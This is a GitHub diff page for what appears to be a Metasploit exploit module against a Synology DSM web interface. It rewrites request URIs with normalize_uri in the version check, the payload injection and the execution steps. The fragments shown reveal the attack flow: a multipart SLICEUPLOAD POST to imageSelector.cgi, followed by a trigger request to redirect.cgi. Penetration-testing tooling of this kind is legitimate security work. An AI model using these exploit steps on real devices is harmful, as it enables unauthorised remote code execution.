File tree Expand file tree Collapse file tree 1 file changed +5
-4
lines changed
modules/exploits/linux/http Expand file tree Collapse file tree 1 file changed +5
-4
lines changed Original file line number Diff line number Diff line change @@ -68,8 +68,9 @@ def check
68
68
print_status ( "#{ peer } - Trying to detect installed version" )
69
69
70
70
res = send_request_cgi ( {
71
- 'method' => 'GET' ,
72
- 'uri' => normalize_uri ( '/webman/info.cgi?host=' )
71
+ 'method' => 'GET' ,
72
+ 'uri' => normalize_uri ( 'webman' , 'info.cgi' ) ,
73
+ 'vars_get' => { 'host' => '' }
73
74
} )
74
75
75
76
if res and res . code == 200 and res . body =~ DEVICE_INFO_PATTERN
@@ -127,7 +128,7 @@ def exploit
127
128
print_status ( "#{ peer } - Injecting the payload..." )
128
129
res = send_request_cgi ( {
129
130
'method' => 'POST' ,
130
- 'uri' => '/ webman/ imageSelector.cgi',
131
+ 'uri' => normalize_uri ( ' webman' , ' imageSelector.cgi') ,
131
132
'ctype' => "multipart/form-data; boundary=#{ mime_msg . bound } " ,
132
133
'headers' => {
133
134
'X-TYPE-NAME' => 'SLICEUPLOAD' ,
@@ -144,7 +145,7 @@ def exploit
144
145
print_status ( "#{ peer } - Executing the payload..." )
145
146
res = send_request_cgi ( {
146
147
'method' => 'GET' ,
147
- 'uri' => '/ redirect.cgi'
148
+ 'uri' => normalize_uri ( ' redirect.cgi') ,
148
149
} )
149
150
150
151
# Read command output if cmd/unix/generic payload was used
You can’t perform that action at this time.
0 commit comments